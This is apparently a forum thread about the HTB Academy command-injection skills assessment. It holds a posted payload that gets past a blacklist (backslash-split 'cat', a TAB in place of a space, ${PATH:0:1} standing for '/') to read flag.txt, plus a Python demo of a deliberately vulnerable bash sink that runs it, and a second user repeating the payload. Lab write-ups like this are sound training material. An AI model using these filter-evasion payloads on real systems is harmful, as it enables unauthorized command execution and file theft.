HTB-Academy Command Injection Skills Assessment

I solved the Command Injection Skills Assessment with this payload:
?to=&from=2380029473.txt%26c\a\t%09${PATH:0:1}flag.txt&finish=1&move=1

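The following is an added worked example, not code from the thread or from HTB, showing why each piece of the payload above survives a blacklist filter and still runs as cat. The blacklist (space, the word "cat", and "/"), the sink command template and the flag location are assumptions made for the demonstration; the real lab filter and backend command are not reproduced here.

```python
import subprocess
import tempfile
from pathlib import Path
from urllib.parse import unquote

# Constructed blacklist, standing in for the lab filter (an assumption, not the
# real HTB code): space, the word "cat" and "/" are rejected anywhere in the value.
BLOCKED = (" ", "cat", "/")

# Constructed vulnerable sink: the decoded "from" value is spliced into a shell
# command string. The real backend command is not known from the thread.
SINK_TEMPLATE = "ls {from_value}"

# The "from" part of the posted payload, still URL-encoded, split into the
# original value and the injected tail.
ORIGINAL_FROM = "2380029473.txt"
POSTED_INJECTION = "%26c\\a\\t%09${PATH:0:1}flag.txt"


def is_blocked(value: str) -> bool:
    """Constructed filter check: True if any blocked token appears in the value."""
    return any(token in value for token in BLOCKED)


def shell_view(query_value: str) -> str:
    """What the shell receives after URL decoding: %26 -> '&', %09 -> TAB."""
    return unquote(query_value)


def slashless(path: str) -> str:
    """Spell a path without a literal '/'. ${PATH:0:1} is bash substring
    expansion (first character of PATH), which is '/' whenever PATH starts
    with an absolute directory."""
    return path.replace("/", "${PATH:0:1}")


def build_injection(target: str) -> str:
    """Decoded injection in the posted style.
    '&'      ends the original command and starts ours.
    c\\a\\t  never contains the literal 'cat'; bash drops the backslashes
             during quote removal, so the word that actually runs is cat.
    TAB      is whitespace to bash, so it separates arguments without a space.
    """
    return "&c\\a\\t\t" + slashless(target)


def run_sink(from_value: str) -> str:
    """Run the sink through bash the way a vulnerable shell_exec() would."""
    cmd = SINK_TEMPLATE.format(from_value=from_value)
    result = subprocess.run(
        ["bash", "-c", cmd],
        capture_output=True,
        text=True,
        env={"PATH": "/usr/bin:/bin"},  # PATH[0] is '/', as on a normal Linux box
    )
    return result.stdout


def demo() -> str:
    """Plant a constructed flag in a temp dir and read it through the bypass."""
    workdir = Path(tempfile.mkdtemp())
    flag = workdir / "flag.txt"
    flag.write_text("HTB{constructed_flag}\n")
    injection = build_injection(str(flag))
    if is_blocked(injection):
        raise RuntimeError("bypass did not pass the filter: " + injection)
    return run_sink(ORIGINAL_FROM + injection)


if __name__ == "__main__":
    print("shell sees:", repr(shell_view(POSTED_INJECTION)))
    print("naive '&cat /flag.txt' blocked:", is_blocked("&cat /flag.txt"))
    print("posted payload blocked:", is_blocked(shell_view(POSTED_INJECTION)))
    print("read through bypass:", demo(), end="")
```

Running it shows the naive "&cat /flag.txt" rejected by the constructed filter while the decoded posted payload passes and bash still executes cat, because the filter inspects the string before bash performs quote removal, word splitting on TAB, and parameter expansion of ${PATH:0:1}. The same checks fail if the backend shell is dash rather than bash, since ${PATH:0:1} is a bash extension.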

Thank you! But what is your logic for getting there? When I try to inject, I do a search for something random and then try to inject here:
ajax=true&content=poc&path=.&type=search%26c\a\t%09${PATH:0:1}flag.txt

How did you come to the conclusion of injecting into the URL and not into the Burp Suite field, and where did you find &from=? I only see /index.php?to=